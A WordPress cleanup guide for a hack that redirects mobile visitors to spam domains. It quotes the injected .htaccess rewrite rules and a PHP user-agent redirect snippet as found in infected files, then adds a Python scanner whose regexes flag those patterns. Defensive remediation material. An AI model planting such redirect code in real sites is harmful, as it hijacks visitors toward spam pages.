Cleaning a hacked WordPress site from a virus that redirects mobile visitors to a spam page
Scenario: when you navigate to a WordPress site from a mobile device, it redirects to some shitty spam pages (e.g. http://luxurytds.com, http://load-app.org, …).
Solution 1: infected .htaccess files
First, check the .htaccess file in the website root. At the top of the file you may find lines like these:
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} android|avantgo|bada/|blackberry|blazer|compal ...
RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s ...
RewriteRule ^$ http://luxurytds.com/go.php?sid=1 [R,L]
Remove them, or, to be really sure, delete the .htaccess file and upload the original file from your local backup.
Secondly, you could find other .htaccess files in /wp-admin, /wp-content, /wp-includes and also in the folders of the domain root (e.g. /public, /private). Delete them.
Solution 2: infected index.php files
As Codex says:
For instance, malicious redirects can often be found in files like .htaccess, and index.php at the root of your website. While others will focus on the wp-content/themes directory targeting index.php, header.php, footer.php and functions.php. These are the more simple variations of course.
The hack could have infected various files (mostly index.php) in your WP installation with code like this:
<?php
$ua = $_SERVER['HTTP_USER_AGENT'];
if(stripos("***$ua",'android') !== false){
header("Location: http://mob-version.ru/");
die();
}
?>
Remove the malicious code or, as said, overwrite the whole file with your clean local file. Overwriting these infected files could be a problem because the “hackers” set their permissions to 444. In that case, remove the infected file and re-upload it.
Notice: In both cases, eventually, flush the permalinks from WordPress > Settings > Permalinks > Save Changes
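A small scanner for the two patterns described above, added here as an example (it is not code from the original post): it flags .htaccess files that pair an HTTP_USER_AGENT condition with a rewrite to an external URL, flags index.php, header.php, footer.php and functions.php files that pair a user-agent check with a hard-coded Location header, and notes when a flagged file has mode 444. The regexes, function names and the placeholder host redirect.example.invalid are assumptions of this example.

```python
import os
import re
import stat
import sys

# Patterns mirror the two infections shown on this page (heuristics, not a full malware scanner).
UA_COND = re.compile(r"RewriteCond\s+%\{HTTP_USER_AGENT\}", re.I)
EXT_RULE = re.compile(r"RewriteRule\s+\S+\s+https?://", re.I)
PHP_UA = re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_USER_AGENT['\"]\s*\]")
PHP_LOC = re.compile(r"header\s*\(\s*['\"]Location:\s*https?://", re.I)
PHP_TARGETS = {"index.php", "header.php", "footer.php", "functions.php"}

# Constructed samples; redirect.example.invalid is a placeholder host.
SAMPLE_HTACCESS = ("RewriteEngine On\nRewriteCond %{HTTP_USER_AGENT} android|blackberry [NC]\n"
                   "RewriteRule ^$ http://redirect.example.invalid/go.php [R,L]\n")
SAMPLE_PHP = ("<?php\n$ua = $_SERVER['HTTP_USER_AGENT'];\nif (stripos(\"***$ua\", 'android') !== false) {\n"
              "header(\"Location: http://redirect.example.invalid/\");\ndie();\n}\n?>\n")


def classify(name, text):
    """Return a reason string if the file content matches a redirect pattern, else None."""
    if name == ".htaccess" and UA_COND.search(text) and EXT_RULE.search(text):
        return "user-agent conditional rewrite to an external host"
    if name in PHP_TARGETS and PHP_UA.search(text) and PHP_LOC.search(text):
        return "user-agent conditional Location header"
    return None


def scan(root):
    """Walk root; return {relative path: (reason, is_mode_444)} for every flagged file."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name != ".htaccess" and name not in PHP_TARGETS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", errors="replace") as fh:
                reason = classify(name, fh.read())
            if reason:
                # 0o444 is the read-only mode the page says the attackers leave behind.
                locked = stat.S_IMODE(os.stat(path).st_mode) == 0o444
                findings[os.path.relpath(path, root)] = (reason, locked)
    return findings


if __name__ == "__main__":
    for rel, (why, locked) in sorted(scan(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        print(f"{rel}: {why}{' [mode 444]' if locked else ''}")
```

Run it with the WordPress root as its argument; a hit is a file to compare against your clean backup, not proof of infection on its own.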
References
http://doktor-andy.de/wordpress/?p=799
http://wordpress.org/support/topic/problems-viewing-site-on-mobile-iphone-htaccess-related
http://codex.wordpress.org/FAQ_My_site_was_hacked